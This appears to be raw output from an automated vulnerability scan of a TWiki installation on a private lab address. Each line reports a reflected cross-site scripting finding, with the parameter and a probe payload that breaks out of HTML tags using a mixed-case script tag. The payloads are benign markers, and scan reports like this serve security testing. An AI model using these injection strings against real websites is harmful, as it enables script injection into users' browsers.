http://192.168.105.200/twiki/bin/oops/TWiki/TWikiAccessControl?template=oopsmore¶m1=1.34¶m2=1.34 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiAccessControl?template=oopsmore¶m1=1.34¶m2=1.34 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >yvZt(2061)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsmore¶m1=1.2¶m2=1.2 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsmore¶m1=1.2¶m2=1.2 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >ZMdq(7895)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TextFormattingRules?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TextFormattingRules?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >VYHS(9431)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev2=1.1&rev1=1.13 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?rev2=1.1&rev1=1.13 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >HJxt(5971)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTemplates?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTemplates?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >AakD(9340)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFE?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFE?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >GeYa(6153)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPluginszAOpGaKKTRsS?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPluginszAOpGaKKTRsS?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >zlhC(1656)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRss?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRss?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >Yexv(7145)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFE?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFE?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >crOY(1753)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >AtVH(7370)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/PeterThoeny?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/PeterThoeny?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >ainf(6671)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >egoY(6294)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?template=oopsmore¶m1=1.10¶m2=1.10 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?template=oopsmore¶m1=1.10¶m2=1.10 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >TkHx(4037)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/PeterThoeny?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/PeterThoeny?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >ainf(6671)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPlugins?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPlugins?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >tWPZ(1509)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/TWikiGroups?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/TWikiGroups?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >NjOP(5062)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >KfHj(1141)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFE?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFE?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >crOY(1753)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsmore¶m1=1.33¶m2=1.33 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsmore¶m1=1.33¶m2=1.33 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >pZJp(6331)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >sbMS(7039)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiName?rev1=1.3&rev2=1.2 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiName?rev1=1.3&rev2=1.2 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >xERz(7035)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/TWikiAdminGroup?template=oopsmore¶m1=1.20¶m2=1.20 | Target: http://192.168.105.200/twiki/bin/oops/Main/TWikiAdminGroup?template=oopsmore¶m1=1.20¶m2=1.20 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >Hsqa(8711)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsupload¶m1=view.ppt | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsupload¶m1=view.ppt has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</code><ScRiPt >tTtd(9970)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSystemRequirements?template=oopsmore¶m1=1.35¶m2=1.35 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSystemRequirements?template=oopsmore¶m1=1.35¶m2=1.35 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >TntV(1629)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >rhnt(9923)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsupload¶m1=piece.mp4 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsupload¶m1=piece.mp4 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >ZiaU(2860)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >KFDg(1578)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiTutorial?rev1=1.13&rev2=1.12 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiTutorial?rev1=1.13&rev2=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev1, vulnerabilitypayload:</title><ScRiPt >UApR(3278)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/top?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/top?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >aWAd(5990)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >KdsD(9762)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOURL?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOURL?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >GKmg(5667)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTemplates?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTemplates?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >AakD(9340)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?template=oopsmore¶m1=1.6¶m2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?template=oopsmore¶m1=1.6¶m2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >MZlm(4554)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/top?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/top?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >aWAd(5990)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >UbAX(8618)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?rev=1.9 | Target: http://192.168.105.200/twiki/bin/view/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?rev=1.9%3C%2Ftitle%3E%3CScRiPt %3EUSRr(1705)%3C%2FScRiPt%3E exists Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability payload: </title><ScRiPt >USRr(1705)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >wyUZ(2737)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebPreferences?template=oopsmore¶m1=1.38¶m2=1.38 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebPreferences?template=oopsmore¶m1=1.38¶m2=1.38 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >NOkX(1910)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopstopicexists | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopstopicexists has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >AcCi(1273)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?template=oopsmore¶m1=1.6¶m2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?template=oopsmore¶m1=1.6¶m2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >uoPe(4619)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSkins?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSkins?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >QdkZ(4467)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >vngn(6845)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiAccessControl?template=oopsmore¶m1=1.34¶m2=1.34 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiAccessControl?template=oopsmore¶m1=1.34¶m2=1.34 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >yvZt(2061)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsmore¶m1=1.12¶m2=1.12 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsmore¶m1=1.12¶m2=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >dial(4055)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiNotation?template=oopsmore¶m1=1.3¶m2=1.3 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiNotation?template=oopsmore¶m1=1.3¶m2=1.3 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >xltb(6335)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPluginszAOpGaKKTRsS?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPluginszAOpGaKKTRsS?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >COZY(2764)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/JavaScript?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/JavaScript?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >UGjL(9051)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?template=oopsupload | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?template=oopsupload has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >jFLc(2648)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiTutorial?rev1=1.13&rev2=1.12 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/TWikiTutorial?rev1=1.13&rev2=1.12 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >UApR(3278)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiNotation?template=oopsupload | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiNotation?template=oopsupload has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >mwpe(8623)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?template=oopsmore¶m1=1.7¶m2=1.7 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?template=oopsmore¶m1=1.7¶m2=1.7 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >qUdy(5462)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/FileAttribute?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/FileAttribute?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >LdRj(2788)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?template=oopsmore¶m1=1.18¶m2=1.18 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?template=oopsmore¶m1=1.18¶m2=1.18 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >Yqgf(1667)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPreferencesoWuBVEKVgQrg?template=oopsmore¶m1=1.54¶m2=1.54 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPreferencesoWuBVEKVgQrg?template=oopsmore¶m1=1.54¶m2=1.54 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >XrtI(9115)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiNotation?template=oopsmore¶m1=1.3¶m2=1.3 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiNotation?template=oopsmore¶m1=1.3¶m2=1.3 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >xltb(6335)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WikiTopic?rev=r1.5 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WikiTopic?rev=r1.5 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</td><ScRiPt >OmkT(3122)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?template=oopsmore¶m1=1.24¶m2=1.24 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?template=oopsmore¶m1=1.24¶m2=1.24 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >tiQU(3083)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiTopic?template=oopsmore¶m1=1.5¶m2=1.5 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiTopic?template=oopsmore¶m1=1.5¶m2=1.5 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >Flox(1409)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/success?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/success?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >IMdT(3879)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/FileAttachment?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/FileAttachment?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</font><ScRiPt >JDrO(8158)</ScRiPt> |
http://192.168.105.200/twiki/bin/view/TWiki/WikiNotation?rev=r1.3 | Target: http://192.168.105.200/twiki/bin/view/TWiki/WikiNotation?rev=r1.3 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev, vulnerabilitypayload:</title><ScRiPt >jUku(2347)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsmore¶m1=1.42¶m2=1.42 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsmore¶m1=1.42¶m2=1.42 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >cYQR(9849)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >rhnt(9923)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/FileAttachment?template=oopsempty | Target: http://192.168.105.200/twiki/bin/oops/TWiki/FileAttachment?template=oopsempty has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >Clwj(8914)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsupload¶m1=piece.mp4 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsupload¶m1=piece.mp4 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</code><ScRiPt >ZiaU(2860)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/sit?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/sit?template=oopsmore¶m1=1.1¶m2=1.1 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >sCPs(7861)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >WrvH(6068)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsupload | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsupload has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >qSSF(5773)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/bad?template=oopsmissing | Target: http://192.168.105.200/twiki/bin/oops/TWiki/bad?template=oopsmissing has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >xVKj(5339)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/FileAttribute?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/TWiki/FileAttribute?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: template, vulnerabilitypayload:<ScRiPt >LdRj(2788)</ScRiPt> |
http://192.168.105.200/twiki/bin/oops/TWiki/YouAreHereswsMZQFRDgCN?template=oopsmore¶m1=1.6¶m2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/YouAreHereswsMZQFRDgCN?template=oopsmore¶m1=1.6¶m2=1.6 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:</li><ScRiPt >TtSL(6019)</ScRiPt> |
http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiTopic?rev1=1.5&rev2=1.4 | Target: http://192.168.105.200/twiki/bin/rdiff/TWiki/WikiTopic?rev1=1.5&rev2=1.4 has Reflective Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: rev2, vulnerabilitypayload:</title><ScRiPt >NNCM(7600)</ScRiPt> |
